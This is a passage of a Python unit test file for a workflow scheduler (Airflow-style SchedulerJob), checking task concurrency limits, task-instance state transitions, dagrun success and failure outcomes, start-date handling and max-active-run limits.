    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.RUNNING
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    # Materialize the keys: a bare map() is a one-shot iterator in
    # Python 3, which is fragile for membership checks.
    res_keys = [x.key for x in res]
    self.assertIn(ti2.key, res_keys)
    ti2.state = State.RUNNING
    session.merge(ti2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
    """QUEUED TIs count against DAG concurrency: with concurrency=3 and one
    RUNNING plus one QUEUED TI, only the single SCHEDULED TI fits."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
    task1 = DummyOperator(dag=dag, task_id='dummy1')
    task2 = DummyOperator(dag=dag, task_id='dummy2')
    task3 = DummyOperator(dag=dag, task_id='dummy3')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dag_run = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dag_run.execution_date)
    ti2 = TI(task2, dag_run.execution_date)
    ti3 = TI(task3, dag_run.execution_date)
    # one slot taken by RUNNING, one by QUEUED, leaving one free
    ti1.state = State.RUNNING
    ti2.state = State.QUEUED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
    """task_concurrency=2 on task1 caps how many of its TIs (running or
    picked up) can be in flight; task2 is unconstrained."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
    task_id_1 = 'dummy'
    task_id_2 = 'dummy2'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1_1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)
    ti1_1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.commit()
    # nothing running: both scheduled TIs are executable
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # one task1 TI running: a second task1 TI still fits under the cap of 2
    ti1_1.state = State.RUNNING
    ti2.state = State.RUNNING
    ti1_2 = TI(task1, dr2.execution_date)
    ti1_2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.merge(ti1_2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    # two task1 TIs running: the cap is reached, nothing more fits
    ti1_2.state = State.RUNNING
    ti1_3 = TI(task1, dr3.execution_date)
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(res))
    # all three back to SCHEDULED: only 2 may be picked up at once
    ti1_1.state = State.SCHEDULED
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # one running again: room for exactly one more task1 TI
    ti1_1.state = State.RUNNING
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
    """An empty TI list must yield an empty result."""
    scheduler = SchedulerJob()
    session = settings.Session()
    result = scheduler._change_state_for_executable_task_instances(
        [], [State.NONE], session)
    self.assertEqual(0, len(result))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
    """When none of the candidate TIs is in an acceptable old state
    (all SCHEDULED, acceptable=[RUNNING]), nothing is transitioned."""
    dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.RUNNING],
        session)
    self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
    """Only TIs whose state is in the acceptable list (NONE, SCHEDULED)
    are moved to QUEUED; the QUEUED TI is left out."""
    dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.QUEUED  # not in the acceptable old states below
    ti3.state = State.NONE
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.NONE, State.SCHEDULED],
        session)
    self.assertEqual(2, len(res))
    ti1.refresh_from_db()
    ti3.refresh_from_db()
    self.assertEqual(State.QUEUED, ti1.state)
    self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
    """Enqueueing queued TIs must hand each of them to the executor."""
    dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dagrun = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dagrun.execution_date)
    session.merge(ti1)
    session.commit()
    # Intercept the executor call rather than running anything for real.
    with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
        scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
    mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
    """With an empty SimpleDagBag, no TIs are queued even if SCHEDULED
    TIs exist in the database."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = SimpleDagBag([])  # deliberately empty
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti1.state = State.SCHEDULED
    session.merge(ti1)
    session.commit()
    self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
    """With concurrency=3 and two TIs already RUNNING, a second dagrun's
    two SCHEDULED TIs can contribute only one more queued TI."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances'
    task_id_1 = 'dummy_task'
    task_id_2 = 'dummy_task_nonexistent_queue'
    # important that len(tasks) is less than concurrency
    # because before scheduler._execute_task_instances would only
    # check the num tasks once so if concurrency was 3,
    # we could execute arbitrarily many tasks in the second run
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    # create first dag run with 1 running and 1 queued
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti1.state = State.RUNNING
    ti2.state = State.RUNNING
    session.merge(ti1)
    session.merge(ti2)
    session.commit()
    self.assertEqual(State.RUNNING, dr1.state)
    self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
                                                   states=[State.RUNNING], session=session))
    # create second dag run
    dr2 = scheduler.create_dag_run(dag)
    ti3 = TI(task1, dr2.execution_date)
    ti4 = TI(task2, dr2.execution_date)
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    # manually set to scheduled so we can pick them up
    ti3.state = State.SCHEDULED
    ti4.state = State.SCHEDULED
    session.merge(ti3)
    session.merge(ti4)
    session.commit()
    self.assertEqual(State.RUNNING, dr2.state)
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    # check that concurrency is respected: 2 running + at most 1 queued
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
                                                   states=[State.RUNNING, State.QUEUED], session=session))
    self.assertEqual(State.RUNNING, ti1.state)
    self.assertEqual(State.RUNNING, ti2.state)
    # exactly one of ti3/ti4 was queued, the other stayed scheduled
    six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
    self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
    """max_tis_per_query=3 limits each query batch, but repeated batches
    must still queue all 8 eligible TIs in a single scheduling pass."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
    task_id_1 = 'dummy_task'
    task_id_2 = 'dummy_task_2'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    scheduler.max_tis_per_query = 3
    session = settings.Session()
    tis = []
    # Build 4 dag runs x 2 tasks = 8 SCHEDULED TIs.
    # was: for i in range(0, 4) with an unused loop index
    for _ in range(4):
        dr = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr.execution_date)
        ti2 = TI(task2, dr.execution_date)
        tis.append(ti1)
        tis.append(ti2)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = State.SCHEDULED
        ti2.state = State.SCHEDULED
        session.merge(ti1)
        session.merge(ti2)
    session.commit()
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    self.assertEqual(8, res)
    for ti in tis:
        ti.refresh_from_db()
        self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
    """TIs whose dagrun is missing or not RUNNING get reset to new_state;
    TIs backed by a healthy RUNNING dagrun, and TIs whose state is not in
    old_states, are left untouched."""
    dag1 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag1,
        owner='airflow')
    DummyOperator(
        task_id='dummy_b',
        dag=dag1,
        owner='airflow')
    dag2 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun_dont_change',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag2,
        owner='airflow')
    dag3 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag3,
        owner='airflow')
    session = settings.Session()
    dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.state = State.SCHEDULED
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.state = State.SUCCESS
    session.commit()
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    # dag3's TI has no dagrun at all
    ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
    ti3.state = State.SCHEDULED
    session.merge(ti3)
    session.commit()
    dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
    scheduler = SchedulerJob(num_runs=0, run_duration=0)
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    # TIs backed by RUNNING dagruns keep their state ...
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.SCHEDULED)
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
    # ... while the dagrun-less TI is reset to NONE.
    ti3.refresh_from_db(session=session)
    # was: assertEquals -- a deprecated alias of assertEqual
    self.assertEqual(ti3.state, State.NONE)
    # Failing dr1 makes its SCHEDULED TI eligible for reset as well.
    dr1.refresh_from_db(session=session)
    dr1.state = State.FAILED
    session.merge(dr1)
    session.commit()
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.NONE)
    # don't touch ti1b: SUCCESS is not in old_states
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    # don't touch ti2: its dagrun is still RUNNING
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
    """The scheduler's execute helper resets orphaned SCHEDULED TIs of
    regular dagruns to NONE, but leaves backfill dagrun TIs alone."""
    session = settings.Session()
    dag = DAG(
        'test_execute_helper_reset_orphaned_tasks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})
    with dag:
        op1 = DummyOperator(task_id='op1')
    dag.clear()
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    # second run with a backfill-prefixed run_id: must not be touched
    dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
                            state=State.RUNNING,
                            execution_date=DEFAULT_DATE + datetime.timedelta(1),
                            start_date=DEFAULT_DATE,
                            session=session)
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    ti.state = State.SCHEDULED
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    processor = mock.MagicMock()
    processor.get_last_finish_time.return_value = None
    # num_runs=0, run_duration=0: a single pass through the helper
    scheduler = SchedulerJob(num_runs=0, run_duration=0)
    executor = TestExecutor()
    scheduler.executor = executor
    scheduler._execute_helper(processor_manager=processor)
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti.state, State.NONE)
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
        self,
        dag_id,
        expected_task_states,  # dict of task_id: state
        dagrun_state,
        run_kwargs=None,
        advance_execution_date=False,
        session=None):
    """
    Helper for testing DagRun states with simple two-task DAGS.
    This is hackish: a dag run is created but its tasks are
    run by a backfill.

    :param dag_id: dag to pull from self.dagbag, clear and run
    :param expected_task_states: dict of task_id -> expected terminal state
    :param dagrun_state: expected final state of the evaluated DagRun
    :param run_kwargs: extra keyword args forwarded to dag.run()
    :param advance_execution_date: schedule a second dagrun so the
        evaluated run's execution_date lies after the start_date
    :param session: injected by @provide_session
    """
    if run_kwargs is None:
        run_kwargs = {}
    scheduler = SchedulerJob()
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    if advance_execution_date:
        # run a second time to schedule a dagrun after the start_date
        dr = scheduler.create_dag_run(dag)
    ex_date = dr.execution_date
    try:
        # the backfill may raise when a task in the run fails; that is
        # expected for the failure-oriented scenarios
        dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
    except (AirflowException, XToolException):
        pass
    # test tasks
    for task_id, expected_state in expected_task_states.items():
        task = dag.get_task(task_id)
        ti = TI(task, ex_date)
        ti.refresh_from_db()
        self.assertEqual(ti.state, expected_state)
    # load dagrun
    dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
    dr = dr[0]
    dr.dag = dag
    self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
    """
    DagRuns with one failed and one incomplete root task -> FAILED
    """
    expected = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.UPSTREAM_FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_fail',
        expected_task_states=expected,
        dagrun_state=State.FAILED)
def test_dagrun_success(self):
    """
    DagRuns with one failed and one successful root task -> SUCCESS
    """
    expected = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_success',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
    """
    DagRuns with one successful and one failed root task -> FAILED
    """
    expected = {
        'test_dagrun_succeed': State.SUCCESS,
        'test_dagrun_fail': State.FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_root_fail',
        expected_task_states=expected,
        dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
    """
    DagRuns with one unfinished and one failed root task -> RUNNING
    """
    # Run both the failed and successful tasks
    scheduler = SchedulerJob()
    dag_id = 'test_dagrun_states_root_fail_unfinished'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    try:
        dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
    except (AirflowException, XToolException):  # Expect an exception since there is a failed task
        pass
    # Mark the successful task as never having run since we want to see if the
    # dagrun will be in a running state despite having an unfinished task.
    session = settings.Session()
    ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
    ti.state = State.NONE
    session.commit()
    dr_state = dr.update_state()
    self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
    """
    DagRun is marked a success if ignore_first_depends_on_past=True

    Test that an otherwise-deadlocked dagrun is marked as a success
    if ignore_first_depends_on_past=True and the dagrun execution_date
    is after the start_date.
    """
    expected = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS,
        advance_execution_date=True,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_dagrun_deadlock_ignore_depends_on_past(self):
    """
    Test that ignore_first_depends_on_past doesn't affect results
    (this is the same test as
    test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
    that start_date == execution_date so depends_on_past is irrelevant).
    """
    expected = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_scheduler_start_date(self):
    """
    Test that the scheduler respects start_dates, even when DAGS have run
    """
    dag_id = 'test_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    # sanity: this DAG's start date lies in the future
    self.assertTrue(dag.start_date > datetime.datetime.utcnow())
    scheduler = SchedulerJob(dag_id,
                             num_runs=2)
    scheduler.run()
    # zero tasks ran
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
    # previously, running this backfill would kick off the Scheduler
    # because it would take the most recent run and start from there
    # That behavior still exists, but now it will only do so if after the
    # start date
    backfill = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE)
    backfill.run()
    # one task ran
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
    scheduler = SchedulerJob(dag_id,
                             num_runs=2)
    scheduler.run()
    # still one task
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_task_start_date(self):
    """
    Test that the scheduler respects task start dates that are different
    from DAG start dates.

    In the fixture DAG, 'dummy1' has a future start_date (must not run)
    while 'dummy2' uses the DAG start_date (must run in both scheduler runs).
    """
    dag_id = 'test_task_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    scheduler = SchedulerJob(dag_id,
                             num_runs=2)
    scheduler.run()

    session = settings.Session()
    tiq = session.query(TI).filter(TI.dag_id == dag_id)
    ti1s = tiq.filter(TI.task_id == 'dummy1').all()
    ti2s = tiq.filter(TI.task_id == 'dummy2').all()
    # dummy1's start_date has not been reached yet; dummy2 ran twice.
    self.assertEqual(len(ti1s), 0)
    self.assertEqual(len(ti2s), 2)
    for t in ti2s:
        self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
    """
    Test that the scheduler can successfully queue multiple dags in parallel.
    """
    dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
    for dag_id in dag_ids:
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()

    scheduler = SchedulerJob(dag_ids=dag_ids,
                             num_runs=2)
    scheduler.run()

    # zero tasks ran for the future-start-date DAG (its start_date has not
    # been reached yet), even while other DAGs were processed in parallel
    dag_id = 'test_start_date_scheduling'
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
    """
    Test if the scheduler does not create multiple dagruns
    if a dag is scheduled with @once and a start_date.
    """
    dag = DAG(
        'test_scheduler_dagrun_once',
        start_date=timezone.datetime(2015, 1, 1),
        schedule_interval="@once")

    scheduler = SchedulerJob()
    dag.clear()
    # First pass creates the single @once run ...
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # ... and a second pass must not create another.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
    """
    Test if _process_task_instances puts the right task instances into the
    queue.
    """
    dag = DAG(
        dag_id='test_scheduler_process_execute_task',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)

    # The scheduler enqueues TI keys via queue.append(...)
    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
    )
def test_scheduler_do_not_schedule_removed_task(self):
    """
    Test that _process_task_instances does not enqueue a task instance whose
    task has been removed from the DAG (the second DAG object has no tasks).
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    # Re-create the DAG without the task, simulating its removal.
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)

    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)

    # The scheduler enqueues via queue.append(...) (see
    # test_scheduler_verify_pool_full, which passes a plain list), so the
    # meaningful assertion is that append was never called; asserting on
    # queue.put was vacuously true for a Mock.
    queue.append.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
    """
    Test that no dagrun is created and no task instance is enqueued for a
    DAG whose start_date lies in the far future.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_too_early',
        start_date=timezone.datetime(2200, 1, 1))
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()
    # No dagrun may be created before the start_date is reached.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)

    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)

    # The scheduler enqueues via queue.append(...) (see
    # test_scheduler_verify_pool_full, which passes a plain list), so
    # assert on append; asserting on queue.put was vacuously true.
    queue.append.assert_not_called()
def test_scheduler_do_not_run_finished(self):
    """
    Test that task instances already in a SUCCESS state are not enqueued
    again by _process_task_instances.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_run_finished',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()

    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    # Mark every TI of the run as finished before processing.
    tis = dr.get_task_instances(session=session)
    for ti in tis:
        ti.state = State.SUCCESS

    session.commit()
    session.close()

    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)

    # The scheduler enqueues via queue.append(...) (see
    # test_scheduler_verify_pool_full, which passes a plain list), so
    # assert on append; asserting on queue.put was vacuously true.
    queue.append.assert_not_called()
def test_scheduler_add_new_task(self):
    """
    Test if a task instance will be added if the dag is updated.
    """
    dag = DAG(
        dag_id='test_scheduler_add_new_task',
        start_date=DEFAULT_DATE)

    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()

    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    # The run starts with exactly one TI (for dag_task1).
    tis = dr.get_task_instances()
    self.assertEquals(len(tis), 1)

    # Add a second task to the (already-running) DAG ...
    dag_task2 = DummyOperator(
        task_id='dummy2',
        dag=dag,
        owner='airflow')

    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)

    # ... and verify the scheduler created a TI for it in the existing run.
    tis = dr.get_task_instances()
    self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
    """
    Test if a dagrun will not be scheduled if max_dag_runs has been reached.
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1

    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()

    # First run is created; the second is blocked by max_active_runs=1.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
    """
    Test if a dagrun will be set failed if it exceeds dagrun_timeout.
    """
    dag = DAG(
        dag_id='test_scheduler_fail_dagrun_timeout',
        start_date=DEFAULT_DATE)
